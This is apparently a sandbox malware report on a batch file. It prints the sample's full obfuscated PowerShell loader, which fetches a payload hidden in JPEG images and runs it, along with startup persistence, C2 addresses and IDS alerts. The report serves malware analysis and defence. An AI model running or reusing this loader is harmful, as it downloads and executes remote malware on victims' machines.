aQBld@G4d@dd@d@7d@Cd@d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bzd@Ggd@dQBmd@GYd@bd@Bld@GQd@Td@Bpd@G4d@awBzd@Cd@d@PQd@gd@Ecd@ZQB0d@C0d@UgBhd@G4d@Zd@Bvd@G0d@Id@d@td@Ekd@bgBwd@HUd@dd@BPd@GId@agBld@GMd@dd@d@gd@CQd@bd@Bpd@G4d@awBzd@Cd@d@LQBDd@G8d@dQBud@HQd@Id@d@kd@Gwd@aQBud@Gsd@cwd@ud@Ewd@ZQBud@Gcd@dd@Bod@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bmd@G8d@cgBld@GEd@YwBod@Cd@d@Kd@d@kd@Gwd@aQBud@Gsd@Id@Bpd@G4d@Id@d@kd@HMd@ad@B1d@GYd@ZgBsd@GUd@Zd@BMd@Gkd@bgBrd@HMd@KQd@gd@Hsd@Id@B0d@HId@eQd@gd@Hsd@Id@Byd@GUd@dd@B1d@HId@bgd@gd@CQd@dwBld@GId@QwBsd@Gkd@ZQBud@HQd@LgBEd@G8d@dwBud@Gwd@bwBhd@GQd@Rd@Bhd@HQd@YQd@od@CQd@bd@Bpd@G4d@awd@pd@Cd@d@fQd@gd@GMd@YQB0d@GMd@ad@d@gd@Hsd@Id@Bjd@G8d@bgB0d@Gkd@bgB1d@GUd@Id@B9d@Cd@d@fQd@7d@Cd@d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@cgBld@HQd@dQByd@G4d@Id@d@kd@G4d@dQBsd@Gwd@Id@B9d@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@EId@eQB0d@GUd@cwd@gd@D0d@Id@d@nd@Ggd@dd@B0d@Ccd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@EId@eQB0d@GUd@cwd@yd@Cd@d@PQd@gd@Ccd@cd@Bzd@Dod@Lwd@vd@Ccd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@Gwd@ZgBzd@GQd@ZgBzd@GQd@Zwd@gd@D0d@Id@d@gd@CQd@QgB5d@HQd@ZQBzd@Cd@d@Kwd@kd@EId@eQB0d@GUd@cwd@yd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bsd@Gkd@bgBrd@HMd@Id@d@9d@Cd@d@Qd@d@od@Cgd@Jd@Bsd@GYd@cwBkd@GYd@cwBkd@Gcd@Id@d@rd@Cd@d@JwBid@Gkd@dd@Bid@HUd@YwBrd@GUd@dd@d@ud@G8d@cgBnd@C8d@YwB6d@Hgd@ed@B4d@Hgd@ed@B4d@Hod@ed@B2d@C8d@ZwBkd@GYd@Zwd@vd@GQd@bwB3d@G4d@bd@Bvd@GEd@Zd@Bzd@C8d@cd@Bpd@GMd@LgBqd@Hd@d@Zwd@/d@DEd@Nd@d@yd@DMd@Nd@d@0d@Ccd@KQd@sd@Cd@d@Kd@d@kd@Gwd@ZgBzd@GQd@ZgBzd@GQd@Zwd@gd@Csd@Id@d@nd@G8d@ZgBpd@GMd@ZQd@zd@DYd@NQd@ud@Gcd@aQB0d@Ggd@dQBid@C4d@aQBvd@C8d@MQd@vd@HQd@ZQBzd@HQd@LgBqd@Hd@d@Zwd@nd@Ckd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@QgB5d@HQd@ZQBzd@Cd@d@PQd@gd@EQd@bwB3d@G4d@bd@Bvd@GEd@Zd@BEd@GEd@dd@Bhd@EYd@cgBvd@G0d@Td@Bpd@G4d@awBzd@Cd@d@Jd@Bsd@Gkd@bgBrd@HMd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Gkd@Zgd@gd@Cgd@Jd@Bpd@G0d@YQBnd@GUd@QgB5d@HQd@ZQBzd@Cd@d@LQBud@GUd@Id@d@kd@G4d@dQBsd@Gwd@KQd@gd@Hsd@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@Cd@d@PQd@gd@Fsd@UwB5d@HMd@dd@Bld@G0d@LgBUd@GUd@ed@B0d@C4d@RQBud@GMd@bwBkd@Gkd@bgBnd@F0d@Ogd@6d@FUd@Vd@BGd@Dgd@LgBHd@GUd@dd@BTd@HQd@cgBpd@G4d@Zwd@od@CQd@aQBtd@GEd@ZwBld@EId@eQB0d@GUd@cwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@HMd@dd@Bhd@HId@dd@BGd@Gwd@YQBnd@Cd@d@PQd@gd@Ccd@Pd@d@8d@EId@QQBTd@EUd@Ngd@0d@F8d@UwBUd@EEd@UgBUd@D4d@Pgd@nd@Dsd@Id@d@kd@GUd@bgBkd@EYd@bd@Bhd@Gcd@Id@d@9d@Cd@d@Jwd@8d@Dwd@QgBBd@FMd@RQd@2d@DQd@XwBFd@E4d@Rd@d@+d@D4d@Jwd@7d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cd@d@PQd@gd@CQd@aQBtd@GEd@ZwBld@FQd@ZQB4d@HQd@LgBJd@G4d@Zd@Bld@Hgd@TwBmd@Cgd@Jd@Bzd@HQd@YQByd@HQd@RgBsd@GEd@Zwd@pd@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bpd@GYd@Id@d@od@CQd@cwB0d@GEd@cgB0d@Ekd@bgBkd@GUd@ed@d@gd@C0d@ZwBld@Cd@d@Md@d@gd@C0d@YQBud@GQd@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@C0d@ZwB0d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Ckd@Id@B7d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cd@d@Kwd@9d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@RgBsd@GEd@Zwd@ud@Ewd@ZQBud@Gcd@dd@Bod@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@Ewd@ZQBud@Gcd@dd@Bod@Ggd@Id@d@9d@Cd@d@Jd@Bld@G4d@Zd@BJd@G4d@Zd@Bld@Hgd@Id@d@td@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@EMd@bwBtd@G0d@YQBud@GQd@Id@d@9d@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@Vd@Bld@Hgd@dd@d@ud@FMd@dQBid@HMd@dd@Byd@Gkd@bgBnd@Cgd@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cwd@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@Ewd@ZQBud@Gcd@dd@Bod@Ggd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GMd@bwBtd@G0d@YQBud@GQd@QgB5d@HQd@ZQBzd@Cd@d@PQd@gd@Fsd@UwB5d@HMd@dd@Bld@G0d@LgBDd@G8d@bgB2d@GUd@cgB0d@F0d@Ogd@6d@EYd@cgBvd@G0d@QgBhd@HMd@ZQd@2d@DQd@UwB0d@HId@aQBud@Gcd@Kd@d@kd@GId@YQBzd@GUd@Ngd@0d@EMd@bwBtd@G0d@YQBud@GQd@KQd@7d@Cd@d@Id@d@gd@CQd@ZQBud@GQd@SQBud@GQd@ZQB4d@Cd@d@PQd@gd@CQd@aQBtd@GEd@ZwBld@FQd@ZQB4d@HQd@LgBJd@G4d@Zd@Bld@Hgd@TwBmd@Cgd@Jd@Bld@G4d@Zd@BGd@Gwd@YQBnd@Ckd@Owd@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@Id@d@9d@Cd@d@WwBTd@Hkd@cwB0d@GUd@bQd@ud@FId@ZQBmd@Gwd@ZQBjd@HQd@aQBvd@G4d@LgBBd@HMd@cwBld@G0d@YgBsd@Hkd@XQd@6d@Dod@Td@Bvd@GEd@Zd@d@od@CQd@YwBvd@G0d@bQBhd@G4d@Zd@BCd@Hkd@dd@Bld@HMd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@BHd@GUd@dd@d@td@Fd@d@cgBvd@GMd@ZQBzd@HMd@Id@B8d@Cd@d@UwBvd@HId@dd@d@td@E8d@YgBqd@GUd@YwB0d@Cd@d@QwBQd@FUd@Id@d@td@EQd@ZQBzd@GMd@ZQBud@GQd@aQBud@Gcd@Id@B8d@Cd@d@UwBld@Gwd@ZQBjd@HQd@LQBPd@GId@agBld@GMd@dd@d@gd@C0d@RgBpd@HId@cwB0d@Cd@d@NQd@gd@Hwd@Id@BGd@G8d@cgBtd@GEd@dd@d@td@FQd@YQBid@Gwd@ZQd@gd@E4d@YQBtd@GUd@Ld@BDd@Fd@d@VQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@HQd@eQBwd@GUd@Id@d@9d@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@LgBHd@GUd@dd@BUd@Hkd@cd@Bld@Cgd@JwB0d@GUd@cwB0d@Hd@d@bwB3d@GUd@cgBzd@Ggd@ZQBsd@Gwd@LgBId@G8d@YQBhd@GEd@YQBhd@GEd@cwBkd@G0d@ZQd@nd@Ckd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@BHd@GUd@dd@d@td@Fd@d@cgBvd@GMd@ZQBzd@HMd@Id@B8d@Cd@d@UwBvd@HId@dd@d@td@E8d@YgBqd@GUd@YwB0d@Cd@d@QwBQd@FUd@Id@d@td@EQd@ZQBzd@GMd@ZQBud@GQd@aQBud@Gcd@Id@B8d@Cd@d@UwBld@Gwd@ZQBjd@HQd@LQBPd@GId@agBld@GMd@dd@d@gd@C0d@RgBpd@HId@cwB0d@Cd@d@NQd@gd@Hwd@Id@BGd@G8d@cgBtd@GEd@dd@d@td@FQd@YQBid@Gwd@ZQd@gd@E4d@YQBtd@GUd@Ld@BDd@Fd@d@VQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@G0d@ZQB0d@Ggd@bwBkd@Cd@d@PQd@gd@CQd@dd@B5d@Hd@d@ZQd@ud@Ecd@ZQB0d@E0d@ZQB0d@Ggd@bwBkd@Cgd@JwBsd@GYd@cwBnd@GUd@Zd@Bkd@GQd@Zd@Bkd@GQd@Zd@Bhd@Ccd@KQd@ud@Ekd@bgB2d@G8d@awBld@Cgd@Jd@Bud@HUd@bd@Bsd@Cwd@Id@Bbd@G8d@YgBqd@GUd@YwB0d@Fsd@XQBdd@Cd@d@Kd@d@nd@HQd@ed@B0d@C4d@OQd@5d@DMd@Nd@Bfd@Dkd@Mgd@yd@Dcd@Od@d@yd@Dgd@Nd@d@3d@DEd@XwBkd@GEd@bwBsd@Hkd@YQBwd@C8d@bgBpd@GEd@bQd@vd@Hcd@YQByd@C8d@dd@Byd@G4d@ZQBtd@HUd@bgd@vd@Gcd@bwBid@G0d@YQBzd@C8d@ZwByd@G8d@LgB0d@GUd@awBjd@HUd@YgB0d@Gkd@Ygd@vd@C8d@OgBzd@Ccd@Ld@d@gd@Ccd@MQd@nd@Cwd@Id@d@nd@Fcd@aQBud@GQd@bwB3d@HMd@VQBwd@GQd@YQB0d@GUd@Jwd@sd@Cd@d@JwBSd@GUd@ZwBBd@HMd@bQd@nd@Cwd@Id@d@nd@Dd@d@Jwd@pd@Ckd@fQB9d@Dsd@Cgd@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($ddsdgo.replace('d@','A')));powershell.exe $OWjuxD"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
26 754
Read events
26 754
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
8012powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_svgrmkwq.crb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7888powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3bwjrr4c.v4i.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8012powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.battext
MD5:23C3470F4DAA563D06DE713A83090994
SHA256:23B0E8E5892B4C9A872AF00F252BCA6004B187B89E23AF6C9D17F7CDCF22C393
7316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_q3jzlyh1.ipw.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8012powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:0ADFA19EE826B9D9AC60DA9380AB610D
SHA256:F07BE965435B4390A9400C85930113E8C5BE63F05A9F08D22E37D32B59A6B1B1
7352powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cgepocmf.fyd.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7800powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ookwvirv.1rl.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7800powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jh5vvokr.p0b.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8012powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h54t1nrr.rhe.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7888powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_30oereav.mtr.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
30
TCP/UDP connections
50
DNS requests
17
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
302
185.166.143.48:443
https://bitbucket.org/czxxxxxxzxv/gdfg/downloads/pic.jpg?142344
unknown
GET
200
185.166.143.50:443
https://bitbucket.org/sambog/numenrt/raw/main/payload_1748287229_4399.txt
unknown
text
2.18 Mb
whitelisted
GET
185.199.111.153:443
https://ofice365.github.io/1/test.jpg
unknown
GET
200
16.182.99.73:443
https://bbuseruploads.s3.amazonaws.com/4cc24b65-2e2b-4b92-9c4a-1a19fbcd59bc/downloads/5079cd2c-886c-41c9-b8f1-edf062c53f03/pic.jpg?response-content-disposition=attachment%3B%20filename%3D%22pic.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNGNCW66EH&Signature=0C7vclYCDkcqSyW5NNcbsWoYwIc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICh8FIMIWki6w6qTMrPyqZebYNtrYjl%2FlUQgF%2FLSscMIAiEA39v%2BY1yFAQf7317UaQfHQjfDm6KDy6CTmVoCtDN2kQgqpwIIZBAAGgw5ODQ1MjUxMDExNDYiDFzVjM2QJpmZR1JPyyqEAsJsgI5vxabmvwLCuYTVjd9Q5zaVKabYKMuoQFvXRVugbZCgtdA4oCJs57%2FDZroUkun2%2FEf85aG9IsYYpWsV0wjC%2BgL6D73%2FwlQXnhnr%2BBxnbdnfe112fZ3e6qjmEOcmW%2BA4hgnx1GGP3hqtCIBWUgVvgkkh0Ip8FgDQMkhOBGEe%2BbFjWtDClYc7nHcaBe2bbAeobQ4JEjbMQfsAXSs%2FpXC4K8PziDLcDpGHmQ1vxRLSV5syh7B1W%2BfgM7z6mjf3Zaa8a1wjLaqJmbi8DhljKtWxqD0bZpFhpWNxCOP%2BgvOP8rEcGGa3qtIyaj1uUeXlIoi8Hwm6ZwyaPjw7Tzg7XmN1pM9HMOKg2MEGOp0Bnr43m6rjBXG1C4BvFG7kw9zPx7yc43mLl90RvHQqHO8rLTU5mlWmbwE6noZuE5dsyg52BRpHoBZgYBAQ8Tq811IQRDfgQgTNAZT2CgeInrC6mO6k1wx%2BpHEKEWibwuGJMra62%2BVyL7EZ%2B9e90ZDOFYJL%2BNcuI4uKa6xVc22pwMeduGTohzRjp2%2BapGwzu%2Fo5Ayqc5YsAO8t3MHGHeQ%3D%3D&Expires=1748375402
unknown
image
3.14 Mb
whitelisted
GET
200
54.231.203.49:443
https://bbuseruploads.s3.amazonaws.com/4cc24b65-2e2b-4b92-9c4a-1a19fbcd59bc/downloads/5079cd2c-886c-41c9-b8f1-edf062c53f03/pic.jpg?response-content-disposition=attachment%3B%20filename%3D%22pic.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNGNCW66EH&Signature=0C7vclYCDkcqSyW5NNcbsWoYwIc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICh8FIMIWki6w6qTMrPyqZebYNtrYjl%2FlUQgF%2FLSscMIAiEA39v%2BY1yFAQf7317UaQfHQjfDm6KDy6CTmVoCtDN2kQgqpwIIZBAAGgw5ODQ1MjUxMDExNDYiDFzVjM2QJpmZR1JPyyqEAsJsgI5vxabmvwLCuYTVjd9Q5zaVKabYKMuoQFvXRVugbZCgtdA4oCJs57%2FDZroUkun2%2FEf85aG9IsYYpWsV0wjC%2BgL6D73%2FwlQXnhnr%2BBxnbdnfe112fZ3e6qjmEOcmW%2BA4hgnx1GGP3hqtCIBWUgVvgkkh0Ip8FgDQMkhOBGEe%2BbFjWtDClYc7nHcaBe2bbAeobQ4JEjbMQfsAXSs%2FpXC4K8PziDLcDpGHmQ1vxRLSV5syh7B1W%2BfgM7z6mjf3Zaa8a1wjLaqJmbi8DhljKtWxqD0bZpFhpWNxCOP%2BgvOP8rEcGGa3qtIyaj1uUeXlIoi8Hwm6ZwyaPjw7Tzg7XmN1pM9HMOKg2MEGOp0Bnr43m6rjBXG1C4BvFG7kw9zPx7yc43mLl90RvHQqHO8rLTU5mlWmbwE6noZuE5dsyg52BRpHoBZgYBAQ8Tq811IQRDfgQgTNAZT2CgeInrC6mO6k1wx%2BpHEKEWibwuGJMra62%2BVyL7EZ%2B9e90ZDOFYJL%2BNcuI4uKa6xVc22pwMeduGTohzRjp2%2BapGwzu%2Fo5Ayqc5YsAO8t3MHGHeQ%3D%3D&Expires=1748375402
unknown
image
3.14 Mb
whitelisted
GET
302
185.166.143.48:443
https://bitbucket.org/czxxxxxxzxv/gdfg/downloads/pic.jpg?142344
unknown
GET
304
52.149.20.212:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
GET
200
52.149.20.212:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
1672
SIHClient.exe
GET
200
23.48.23.188:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1672
SIHClient.exe
GET
200
23.48.23.188:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7888
powershell.exe
185.166.143.49:443
bitbucket.org
AMAZON-02
NL
whitelisted
7888
powershell.exe
3.5.13.130:443
bbuseruploads.s3.amazonaws.com
AMAZON-AES
US
whitelisted
8152
RegAsm.exe
193.26.115.21:6969
RELIABLESITE
US
unknown
7352
powershell.exe
185.199.108.153:443
ofice365.github.io
FASTLY
US
shared
7352
powershell.exe
185.166.143.49:443
bitbucket.org
AMAZON-02
NL
whitelisted
7352
powershell.exe
3.5.27.182:443
bbuseruploads.s3.amazonaws.com
AMAZON-AES
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
google.com
  • 142.250.181.238
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.249
whitelisted
bitbucket.org
  • 185.166.143.49
  • 185.166.143.50
  • 185.166.143.48
whitelisted
bbuseruploads.s3.amazonaws.com
  • 3.5.13.130
  • 16.182.38.1
  • 52.216.61.153
  • 3.5.24.210
  • 3.5.29.186
  • 54.231.195.33
  • 3.5.27.253
  • 16.15.193.12
  • 3.5.27.182
  • 52.216.237.227
  • 52.217.96.156
  • 54.231.229.73
  • 52.216.218.81
  • 52.216.57.1
  • 3.5.8.150
  • 3.5.30.243
whitelisted
ofice365.github.io
  • 185.199.108.153
  • 185.199.109.153
  • 185.199.111.153
  • 185.199.110.153
unknown
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
crl.microsoft.com
  • 23.48.23.188
  • 23.48.23.140
  • 23.48.23.177
  • 23.48.23.138
  • 23.48.23.183
  • 23.48.23.145
  • 23.48.23.191
  • 23.48.23.180
  • 23.48.23.139
whitelisted
www.microsoft.com
  • 2.16.253.202
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
PAYLOAD [ANY.RUN] Reverse Base64 Encoded EXE Inbound
A Network Trojan was detected
ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound
A Network Trojan was detected
PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
A Network Trojan was detected
ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
4ix598.bat